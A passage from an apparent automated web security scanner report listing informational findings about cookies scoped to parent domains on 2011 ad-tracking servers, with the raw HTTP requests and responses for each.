Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:04 GMT

GIF89a.............!.......,...........D..;
9.32. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:06 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;
9.33. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2417656649724524407

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2417656649724524407; Domain=.mediabrandsww.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;
9.34. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3706692347515356359

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3706692347515356359; Domain=.p-td.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;
9.35. http://data.adsrvr.org/map/cookie/contextweb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/contextweb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /map/cookie/contextweb HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967
Pragma: no-cache
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 09-May-2012 14:00:08 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=56D14B6C0CC14A5761E9A7895E1F89AF; path=/
Content-Length: 213

Redirecting to: <a href="http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967">http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988
...[SNIP]...
9.36. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.irishtimes.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.irishtimes.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1nv0nd4 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 456
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 14:04:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 14:04:32 GMT; Path=/
Set-Cookie: di=%7B%7D..1304949872.1FE|1304949872.1OD|1304949872.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 08:22:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 14:04:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 14:04:32 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degree
...[SNIP]...
9.37. http://edge.quantserve.com/quant.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.quantserve.com
Path:   /quant.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: edge.quantserve.com

Response

HTTP/1.1 200 OK
Connection: close
ETag: "20606:E0-713827831-1304949969580"
Vary: Accept-Encoding
Last-Modified: Mon, 09-May-2011 14:06:09 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4dc7f4d1-8dd66-3f1ef-84d25; expires=Mon, 09-May-2021 14:06:09 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 14:06:09 GMT
Date: Mon, 09 May 2011 14:06:09 GMT
Server: QS
Content-Length: 5265

if(!__qc){var __qc={qcdst:function(){if(__qc.qctzoff(0)!=__qc.qctzoff(6))return 1;return 0;},qctzoff:function(m){var d1=new Date(2000,m,1,0,0,0,0);var t=d1.toGMTString();var d3=new Date(t.substring(0,
...[SNIP]...
9.38. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?[AQB]&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: f2nthevine.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_l8dx7Ebox7Ccdo=[CS]v4|0-0|4DC7F500[CE]; Expires=Sat, 7 May 2016 14:06:56 GMT; Domain=.112.2o7.net; Path=/
Location: http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?AQB=1&pccr=true&&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:56 GMT
Last-Modified: Tue, 10 May 2011 14:06:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain

9.39. http://floridatoday.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://floridatoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=13767 HTTP/1.1
Host: floridatoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvajK5QA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:41 GMT
Age: 0
Connection: keep-alive
Content-Length: 11706

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
9.40. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gpaper114.112.2o7.net
Path:   /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519?AQB=1&pccr=true&&ndh=1&t=9/4/2011%208%3A59%3A45%201%20300&pageName=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%28201105080108%29&g=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&cc=USD&server=SAXO-GEL&events=event3&v1=gpaper114&v5=local_news&c6=news&c7=local_news&c11=/article/20110508/NEWS01/105080319&c16=article&c17=news&c23=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&c24=floridatoday.com&c25=gpaper114&c29=1&c44=/article/20110508/NEWS01/105080319&c48=no%20segments&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: gpaper114.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|0-0|4DC7F352[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:48 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_nyhylx7B88x3D=[CS]v4|26E3F9AA051612A9-400001A680400F96|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9AA051612A9-400001A680400F98|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 13:59:48 GMT
Last-Modified: Tue, 10 May 2011 13:59:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DC7F354-253C-40A45FE4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www652
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
9.41. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 302 Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Wed, 08-May-13 14:00:04 GMT
Cache-Control: private
X-Version: DataXu Pixel Tracker v3
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=535039&ev=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0

9.42. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQC&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
